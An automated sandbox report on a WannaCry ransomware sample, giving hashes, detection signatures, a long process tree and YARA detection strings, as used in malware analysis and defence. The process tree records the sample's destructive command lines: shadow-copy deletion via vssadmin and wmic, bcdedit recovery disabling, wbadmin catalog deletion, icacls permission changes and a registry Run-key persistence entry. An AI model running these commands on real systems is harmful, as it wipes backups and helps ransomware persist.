Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WannaCry.bin.zip

Overview

General Information

Sample name:WannaCry.bin.zip
Analysis ID:1525431
MD5:ea519b09029a4f50fa287b56ff0a4ced
SHA1:de8247d49aa8b8f036afe47838044bdf6abc8f3d
SHA256:03c844091ab3980e0ae13be2e456c3e00cfa3971139b53b95850db37757a9e84
Infos:

Detection

Conti, Wannacry
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Delete shadow copy via WMIC
Yara detected Conti ransomware
Yara detected Wannacry ransomware
Command shell drops VBS files
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the document folder of the user
Found Tor onion address
Installs TOR (Internet Anonymizer)
May use the Tor software to hide its network traffic
Modifies existing user documents (likely ransomware behavior)
Moves itself to temp directory
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Tries to harvest and steal browser information (history, passwords, etc)
Uses bcdedit to modify the Windows boot settings
Uses cmd line tools excessively to alter registry or file data
Writes many files with high entropy
Writes to foreign memory regions
Abnormal high CPU Usage
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a Chrome extension
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses cacls to modify the permissions of files
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 6928 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • 7zG.exe (PID: 1092 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap23742:84:7zEvent9207 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • WannaCry.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\WannaCry.exe" MD5: 84C82835A5D21BBCF75A61706D8AB549)
    • attrib.exe (PID: 548 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • icacls.exe (PID: 4464 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)
      • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • backgroundTaskHost.exe (PID: 7148 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
    • backgroundTaskHost.exe (PID: 4256 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca MD5: DA7063B17DBB8BBB3015351016868006)
    • taskdl.exe (PID: 2132 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6372 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • cmd.exe (PID: 1252 cmdline: C:\Windows\system32\cmd.exe /c 7551728024260.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cscript.exe (PID: 3644 cmdline: cscript.exe //nologo m.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
    • taskdl.exe (PID: 5708 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1388 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6344 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 512 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 800 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6392 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1420 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5904 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 400 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2360 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3856 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3412 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1884 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1928 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1320 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2184 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4376 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2312 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2328 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3164 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3600 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3584 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3648 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5216 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4528 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3916 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1288 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4724 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4280 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3892 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5780 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5496 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5844 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4464 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5796 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2240 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 552 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4408 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2344 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1456 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4284 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2980 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6532 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4300 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3644 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1252 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3896 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6272 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 512 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3748 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 344 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4928 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskhsvc.exe (PID: 6940 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)
        • conhost.exe (PID: 3132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskdl.exe (PID: 5140 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • cmd.exe (PID: 5048 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • @WanaDecryptor@.exe (PID: 1112 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)
        • cmd.exe (PID: 3604 cmdline: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 2836 cmdline: wmic shadowcopy delete MD5: E2DE6500DE1148C7F6027AD50AC8B891)
    • @WanaDecryptor@.exe (PID: 4924 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • cmd.exe (PID: 6220 cmdline: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 1740 cmdline: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • taskdl.exe (PID: 2896 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • consent.exe (PID: 1244 cmdline: consent.exe 6008 686 000002152F62E5C0 MD5: DD5032EF160209E470E2612A8A3D5F59)
      • svchost.exe (PID: 6008 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • @WanaDecryptor@.exe (PID: 2516 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5400 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2156 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2300 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2496 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3456 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2328 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6252 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3460 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3648 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7056 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1156 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2644 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3964 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3540 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3564 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5448 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3116 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3724 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 604 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1324 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4464 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5796 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1824 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2828 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7124 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7048 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6528 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4496 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4296 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2100 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7084 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3644 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6344 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6648 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6272 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2028 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2748 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4932 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5132 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 644 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1420 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 640 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1544 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2736 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2724 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1820 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2212 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2516 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2156 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2740 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3268 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4376 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3428 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3760 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3456 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6268 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5556 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6252 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3680 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5432 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4528 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1520 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4704 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1112 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 704 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2644 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3540 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3892 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5448 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6968 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2296 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3164 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1324 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6900 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1276 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 380 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1212 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4184 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7124 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7048 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1032 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6224 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4300 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6196 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2100 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3720 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5568 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3644 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4792 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5932 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3792 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4440 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6588 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5016 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2028 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4968 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1048 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5060 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6264 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3856 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1304 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 400 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5584 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1480 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1884 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2176 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2300 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2512 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1976 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2388 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 348 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5444 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6676 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Conti, Conti LockConti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.conti
NameDescriptionAttributionBlogpost URLsLink
WannaCryptor, WannaCry, WannaCrypt
  • Lazarus Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor
No configs have been found
SourceRuleDescriptionAuthorStrings
WannaCry.binJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    WannaCry.binWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
    • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0x342d41:$x2: taskdl.exe
    • 0x35962d:$x2: taskdl.exe
    • 0xf4d8:$x3: tasksche.exe
    • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0xf52c:$x5: WNcry@2ol7
    • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0x359d91:$s2: Windows 10 -->
    • 0xf42c:$s3: cmd.exe /c "%s"
    • 0x41980:$s4: msg/m_portuguese.wnry
    • 0x3591ff:$s4: msg/m_portuguese.wnry
    • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
    • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
    • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
    WannaCry.binwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
